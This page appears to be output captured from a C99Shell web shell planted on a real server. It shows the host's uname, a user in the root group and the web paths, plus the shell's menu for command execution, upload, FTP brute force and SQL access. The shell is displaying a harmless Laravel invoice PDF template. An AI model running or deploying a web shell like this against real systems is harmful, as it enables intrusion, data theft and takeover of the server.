!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/inventory.picotech.app/public_html/storage/framework/views/   drwxrwxr-x
Free 28.8 GB of 117.98 GB (24.41%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     1277428fb31854ac23a1c2ae4d37d642b3dfc3f3.php (6.21 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<!DOCTYPE html>
<html lang="en">
   <head>
      <meta charset="utf-8">
      <title>Sale _<?php echo e($sale['Ref']); ?></title>
      <link rel="stylesheet" href="<?php echo e(public_path().('/css/pdf_style.css')); ?>" media="all" />
   </head>

   <body>
      <header class="clearfix">
         <div id="logo">
         <img src="<?php echo e(public_path().('/images/'.$setting['logo'])); ?>">
         </div>
         <div id="company">
            <div><strong> Date: </strong><?php echo e($sale['date']); ?></div>
            <div><strong> Number: </strong> <?php echo e($sale['Ref']); ?></div>
            <div><strong> Status: </strong> <?php echo e($sale['statut']); ?></div>
            <div><strong> Payment Status: </strong> <?php echo e($sale['payment_status']); ?></div>
         </div>
         <div id="Title-heading">
            Sale  <?php echo e($sale['Ref']); ?>

         </div>
      </header>
      <main>
         <div id="details" class="clearfix">
            <div id="client">
               <table class="table-sm">
                  <thead>
                     <tr>
                        <th class="desc">Customer Info</th>
                     </tr>
                  </thead>
                  <tbody>
                     <tr>
                        <td>
                           <div><strong>Name:</strong> <?php echo e($sale['client_name']); ?></div>
                           <div><strong>Phone:</strong> <?php echo e($sale['client_phone']); ?></div>
                           <div><strong>Address:</strong>   <?php echo e($sale['client_adr']); ?></div>
                           <div><strong>Email:</strong>  <?php echo e($sale['client_email']); ?></div>
                        </td>
                     </tr>
                  </tbody>
               </table>
            </div>
            <div id="invoice">
               <table class="table-sm">
                  <thead>
                     <tr>
                        <th class="desc">Company Info</th>
                     </tr>
                  </thead>
                  <tbody>
                     <tr>
                        <td>
                           <div id="comp"><?php echo e($setting['CompanyName']); ?></div>
                           <div><strong>Address:</strong>  <?php echo e($setting['CompanyAdress']); ?></div>
                           <div><strong>Phone:</strong>  <?php echo e($setting['CompanyPhone']); ?></div>
                           <div><strong>Email:</strong>  <?php echo e($setting['email']); ?></div>
                        </td>
                     </tr>
                  </tbody>
               </table>
            </div>
         </div>
         <div id="details_inv">
            <table  class="table-sm">
               <thead>
                  <tr>
                     <th>PRODUCT</th>
                     <th>UNIT PRICE</th>
                     <th>QUANTITY</th>
                     <th>DISCOUNT</th>
                     <th>TAX</th>
                     <th>TOTAL</th>
                  </tr>
               </thead>
               <tbody>
                  <?php $__currentLoopData $details$__env->addLoop($__currentLoopData); foreach($__currentLoopData as $detail): $__env->incrementLoopIndices(); $loop $__env->getLastLoop(); ?>
                  <tr>
                     <td>
                         <div style="max-width: 200px;">
                        <span><?php echo e($detail['code']); ?> (<?php echo e($detail['name']); ?>)</span>
                           <?php if($detail['is_imei'] && $detail['imei_number'] !==null): ?>
                              <p>IMEI/SN : <?php echo e($detail['imei_number']); ?></p>
                           <?php endif; ?>
                         <?php if($detail['serial_expires'] && isset($detail['serial_expires']['serials']) && count($detail['serial_expires']['serials'])>0): ?>
                             <p>
                                 <?php $__currentLoopData $detail['serial_expires']['serials']; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $key=>$serial): $__env->incrementLoopIndices(); $loop $__env->getLastLoop(); ?>
                                     <?php echo e($serial); ?><?php echo e(isset($detail['serial_expires']['expiry'][$key])?":".$detail['serial_expires']['expiry'][$key]:''); ?>,
                                 <?php endforeach; $__env->popLoop(); $loop $__env->getLastLoop(); ?>
                             </p>
                         <?php endif; ?>
                         </div>
                     </td>
                     <td><?php echo e($detail['price']); ?> </td>
                     <td><?php echo e($detail['quantity']); ?>/<?php echo e($detail['unitSale']); ?></td>
                     <td><?php echo e($detail['DiscountNet']); ?> </td>
                     <td><?php echo e($detail['taxe']); ?> </td>
                     <td><?php echo e($detail['total']); ?> </td>
                  </tr>
                  <?php endforeach; $__env->popLoop(); $loop $__env->getLastLoop(); ?>
               </tbody>
            </table>
         </div>
         <div id="total">
            <table>
               <tr>
                  <td>Order Tax</td>
                  <td><?php echo e($sale['TaxNet']); ?> </td>
               </tr>
               <tr>
                  <td>Discount</td>
                  <td><?php echo e($sale['discount']); ?> </td>
               </tr>
               <tr>
                  <td>Shipping</td>
                  <td><?php echo e($sale['shipping']); ?> </td>
               </tr>
               <tr>
                  <td>Total</td>
                  <td><?php echo e($symbol); ?> <?php echo e($sale['GrandTotal']); ?> </td>
               </tr>

               <tr>
                  <td>Paid Amount</td>
                  <td><?php echo e($symbol); ?> <?php echo e($sale['paid_amount']); ?> </td>
               </tr>

               <tr>
                  <td>Due</td>
                  <td><?php echo e($symbol); ?> <?php echo e($sale['due']); ?> </td>
               </tr>
            </table>
         </div>
         <div id="signature">Signature</div>
      </main>
   </body>
</html>
<?php /**PATH /home/picotech/domains/inventory.picotech.app/public_html/resources/views/pdf/sale_pdf.blade.php ENDPATH**/ ?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0052 ]--